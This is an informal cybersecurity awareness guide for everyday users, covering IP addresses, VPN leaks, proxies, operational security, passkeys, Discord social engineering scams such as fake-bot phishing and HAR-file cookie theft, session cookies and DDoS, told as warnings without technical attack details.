Cybersecurity Guide

IP Address (Internet Protocol)

An IP address is your address on the network (Layer 3 of the OSI and TCP/IP model). It is needed to communicate over the network layer (beyond the router). It is the same as if your friend wants to mail you; they need to know your physical address to send it to.

You have two types of IP addresses (thanks to network address translation/NAT):

• Private IP address: This is needed to communicate on your local area network (LAN), like the devices in a house or a company. A private IP address of a device in your home network can be reused in another home network.
  
  A private IP address is only relevant if you are in that local network; thus, it is not harmful for others to know. And if they have already gained access to your home network, they can simply scan for devices on the network.
• Public IP address: This is necessary for communicating over the internet when you leave your LAN (traffic exiting the router/modem). Every device on the internet that you contact can see your public IP address (websites, apps, games, …).
  
  You can estimate the range of where a public IP address originates from (City, ISP name, …), not exactly (Physical coordinates). Most public IP addresses are dynamic, thus they change over time. If you have a static IP address, then it stays so and doesn’t change.
  
  It is impossible to know your exact physical location by the IP address itself, unless you hack into the ISP’s systems. However, ISPs can have data breaches as well. It is also possible by matching your IP address to other stolen data in other data breaches (emails, old accounts, social media) that contain your IP address and additional information. It is by hand of combinations of information (username, old posts, photos with metadata) that you can puzzle to find your location, this is called cross-referencing.
  
  If they really want to, they could also DDOS you, more on that later.
  
  Another attack they can do is scanning for open ports (ports you forwarded, for example, for a website you host or a Minecraft server), and attack the service itself. So let’s say you have a computer hosting a Minecraft server, then they can attack it to take over that computer. That’s why it’s important to keep your computer and the stuff that’s running on it up to date. You shouldn’t port forward in the first place if you don’t have a security background. If you are unsure if you have open ports, check it in your router settings, or fill in your IP address in Shodan, but it isn’t real-time.

HTTPS (HyperText Transfer Protocol Secure)

HTTPS is the same as HTTP (a protocol to communicate with a web server), but with an additional security layer on top.

The problem here with HTTP is:

• It’s not encrypted, thus clear/plain text. If I could sit between the connection of you and the web server, then I could see all the web traffic, thus your username, password, and even your cookie.
• It can be altered, so an attacker could modify your traffic and thus inject scripts, etc.
• Fake website: When you enter the exact correct domain name/website, it is possible to go to a fake one without anyone/anything knowing.

You don’t have all these problems with HTTPS. But this doesn’t mean that HTTPS is 100% secure; there are still other attacks that HTTPS doesn’t cover.

VPN (Virtual Private Network)

A VPN is an overlay network; it creates a logical/virtual network topology.

Simply said, it is a tunnel between you and the VPN server. All your network traffic that goes over the internet first goes through the tunnel and then to its destination. In most cases, local traffic to your LAN doesn’t pass the tunnel. Most VPN tunnels are encrypted. For the things you visit (games, websites, …), they will see your VPN server’s IP address.

Is it 100% private? You don’t know; most VPN services claim to have a no-log policy, but that’s up to you to believe. A no-log policy means that they don’t log your activities.

Things that can still leak the VPN:

• If WebRTC is enabled (which is in some browsers) and the VPN isn’t configured correctly, then the WebRTC traffic does not go through your VPN.
• Some DNS scenarios (ISP DNS, router DNS, hardcoded DNS, hardcoded means it is written in the software code).
• IPv6 traffic (when the VPN only handles IPv4 traffic).
• Split tunnelling (configuration to only allow certain applications).
• Sometimes hardcoded IPs that don’t use the DNS (game launchers, anti-cheat, DRM systems, some crypto wallets).
• UDP traffic (When the VPN only tunnels TCP traffic).
• Sometimes torrent clients.
• VPN reconnect/short drops (sleep/wake, Wi-Fi switch, only when VPN doesn’t handle these).
• ICMP (if the VPN doesn’t support this).
• Malware/spyware.

It is also a common misunderstanding that all traffic before your VPN was turned on will be forgotten. For example, when you sign up for an account without a VPN, that information will be logged and remembered, no matter how many times you use your VPN afterwards.

Should you always use a VPN? Well, it depends on your scenario. Modern VPNs come with extra security features, but aren’t 100% needed. They market it like it is a must-have tool, which isn't true.

When you should use it:

• Public network
• P2P like torrenting
• When privacy is necessary

For a VPN, I can only advise ProtonVPN and Mullvad.

Proxy

A proxy is similar to a VPN, but without all the fancy stuff. It routes all traffic to a proxy server, thus changing your IP to the proxy server’s IP.

There are several types of proxies. But the one I advise you to use when visiting links that potentially are IP grabbers is a webproxy.

A good webproxy that I use a lot is Proxyium. You just paste the link in there, and it will all run on the proxy server. Keep in mind that they can still get all user-end/front-end/browser-side information. Only the IP changes. Thus, things like which browser you use, which OS you have. If they fetch your IP address on your browser side, then that doesn’t matter, because that request is always routed via the proxy.

OPSEC (Operational Security)

Simply said, operational security is keeping sensitive information safe so attackers can’t exploit it. In practice, this means being careful with what you share, store, or do online and in your systems.

Examples of good opsec:

• Don’t share any PII (Personal Identifiable Information):
  • Birthday/age/date of birth
  • Any location, like a country you live in or are going to vacation in, even Europe, place of birth
  • Any letters of your name
  • Your school or hobby
  • Gender
  • Phone/email address (use burner email when making accounts like Temp-mail.org, or make aliases like SimpleLogin or AnonAddy)
  • Health conditions
  • Browsing History
  • Preferences and habits
  • A lot more
• Indirect Identification
  • Texting/Chatting
    • Typing style
    • Spelling mistakes
    • Grammar habits
    • Emoji usage
    • Slang phrases
    • Capitalization
    • Time of day you’re active
    • Sleep scheduling
    • Posting frequency
    • Response speed
    • Days you’re most active
    • Topics you talk about
    • Niche interests
    • Opinions
    • Usernames
    • Who do you reply to
    • Who you argue with or support
    • How you structure replies
    • Reactions
    • Emotional response
    • Humor style
    • Conflict resolution style
    • Over/under explaining
  • Other
    • Operating System (Windows, iPhone)
    • Microphone background noise
    • Keyboard sounds
    • Weather/local events
    • Holidays you reference
    • School/work schedule clues
• Metadata
  • Image metadata (EXIF)
  • File creation
  • File author
  • Screenshot resolutions
  • File names

A privacy-focused browser that I highly recommend is DuckDuckGo, and for a privacy and security-focused communication app, I recommend Session.

Passkeys

A passkey is a lot more secure than traditional passwords; it is based on cryptographic key pairs.

Here’s an overview:

• Phishing is practically impossible because it is domain-bound.
• No shared secrets that can be stolen by data breaches.
• No reuse, unlike passwords.

A passkey is stored on your device, which also means that if it is stolen and unlocked, they have access to it. Thus, malware is also a thing. Attackers can also social engineer you if you are vulnerable to it. The way they are synchronised (iCloud, Google Password Manager) can be a target as well, thus not syncing them is a security feature.

A passkey combines something you have (your device) and something you are/know (biometric/PIN). It also only works with HTTPS.

Do I advise you to replace MFA and passwords with passkeys? I 100% do, but under one condition: If you don’t have access to the device you have the passkey on, your account will be lost; thus, store them on multiple devices, and you are good to go. Or you can just buy a YubiKey, which is a USB device that you store in your key.

SOCENG (Social Engineering)

Social Engineering, how I would say it, is hacking humans. The most common attack method hackers use.

Social Engineering has several forms, which are the following:

• Phishing
• Pretexting (creating false scenarios)
• Baiting (Files/USB labelled as “confidential” or “salaries”)
• Impersonation
• Tailgating / Piggybacking (Following someone into a restricted area, claiming to have forgotten a badge, carrying boxes to appear legitimate)
• Scareware to disable your critical thinking (Fake virus alert, “Your account will be closed in 24 hours”, NFSW, hacked, someone trying to log in)
• Reverse Social Engineering (Attacker makes victim ask the attacker for help)
• BitB (Browser in the Browser, where they fake a new browser window that’s actually just in the browser; you can check this if you can’t move that window outside the browser)
• And more

It might sound harmless and dumb to fall for, but it is actually the most dangerous and largest vulnerability a company or group has. Because here is the thing: your staff is your weakest spot. Just because there are many of them, and because they don’t believe or know what Soceng actually can do. Humans are social creatures; keep that in mind.

Here are some examples in Discord:

• Someone asks you to copy and paste a message, which can get you banned or your whole server raided. (for security reasons, I won't disclose further details)
• You join a new gaming server with 1k members actively chatting, and you verify your account with a verified bot, and boom, your account has been stolen. (QR Code, no further details)
• You see an image with a mouse, and an arrow pointing to the middle mouse wheel, saying middle-click this image, you do it, and boom, your IP, ISP, Browser name, OS name, … got leaked. (grabbing website)
• Your face got leaked by someone, he claims, but the image with your face keeps loading, and you open it up in your browser and boom, IP, ISP, browser name, OS name got leaked. (grabbing website)
• Someone asks you to chat on another platform that is safer and more private, or for whatever reason. You call each other on Zoom/telegram/whatever, and boom, your IP got leaked. (P2P)
• Password Reset Phishing Scenario: You got messaged by a bot named Discord with a blue Discord logo. He says you requested that your password be reset because you forgot it. You ignore it, 10 minutes later, he says your password has been successfully reset. If it wasn’t you, he says you need to undo it and check your security features by following this exact official Discord link. You click on it and need to log in to Discord (because your password has been reset). You do so; luckily, you enabled MFA, so Discord asks you to give the MFA code. Like usual, you go to your authenticator app and fill in the code, and you are logged into Discord. Everything is normal, you get a message from the same Discord bot saying you have undone your password reset, and you should use passkeys (just for security purposes, you didn’t do that in this example, it’s just for gaining trust). This whole thing was fake. And the attacker stole your cookie.
  
  How he got your cookie: He made a fake Discord bot using the same name as the real Discord bot. He messaged you a message saying someone reset your password with a link to do so. The link was to a fake Discord clone, but the link itself looked the same as Discord’s domain, etc. You ignore that. The bot has a timer of 10 minutes. If you didn’t fill in your credentials in time, he will send you another message saying your password has been reset with a link to undo it (same Discord exact domain), but when you click it, you get this pop-up, like always, to check the URL (it was different). But you trust the Discord bot, are panicked, and never check it because it’s annoying. You visit the login screen, which is actually Discord, but an AitM (more on that later). You log in, and everything is normal. The bot detected your login and sent you a message that your password reset has been undone as if nothing happened.
• A GFX artist asks you to use your avatar, and you agree. She asks you to screenshare or sends you a video with 100k views on how to get your avatar officially. The video says you need to press F12, go to your avatar tab, download a file of your avatar and send it to her and boom, she got your cookie. (HAR file)
• Someone thinks you are cheating and turns the whole group on you and threatens you to ban you or put you in cheater databases. You didn’t do anything and asked for a PC check, they PC check you, ask you to do a bunch of legit PC checking things, searching for exploits and injectors in your search history, etc. He asks you to open developer tools and scroll through your exploit logs, and boom, he got your cookie. (Scrolled in the network tab through your network headers and thus also your cookies)

And always should do the following:

• Hover over links or check the open link warnings to see the true link.
• Put the link in VirusTotal to check if it is malicious, or search the domain in Google (not visiting the website, just searching if the link is known to be trusted).
• Put the link in a webproxy as I said earlier.

If no one ever tried to scam you, or you have been scammed before, or you are smart and want to avoid these situations, then I strongly suggest not letting anyone add you as a friend or private message you. Even people you trust, because an attacker can buy a non-alternative account looking account of the market, build a strong relationship with you to gain trust, or a friend that you already trust that got hacked. Because if they can’t get to you directly, they will go through your friends or people you trust.

If you want to test your phishing detection skills, then here is a test you should consider taking: Google’s Phishing Quiz.

Cookie/Session Token

A cookie/session token’s only purpose is for a better user experience.

When you log into Instagram, for example. You want to stay logged in. You don’t need to give your credentials every time you revisit Instagram. For this to work, the website needs to remember you. Every time you log in, the server will store your cookie in your browser. Because when it doesn’t, you will be forgotten.

In short:

• A cookie is a value stored in your browser that will be remembered when you reopen your browser or restart your PC. It is to remember website preferences and anything that the website needs to remember.
• A session token, on the other hand, is generated text that is stored as/in a cookie so you don’t have to login everytime you visit the website.

If you take someone else’s token and put it in the browser, the website will think it is the other person revisiting the website.

If anyone stole your cookie, you can reset it by changing your password.

DoS Attack (Denial of Service)

This is a cyber attack where an attacker wants to take down a service; it could be caused by anything.

The most common method is by a DDoS (Distributed DoS), this is where an attacker uses a large number of (mostly infected) devices that flood your bandwidth/resources. If you want to see this in action, then you can visit this webpage.

Other methods are, for example, an exploit that crashes a web server so it’s not reachable anymore. It is just the practice of making a service unreachable.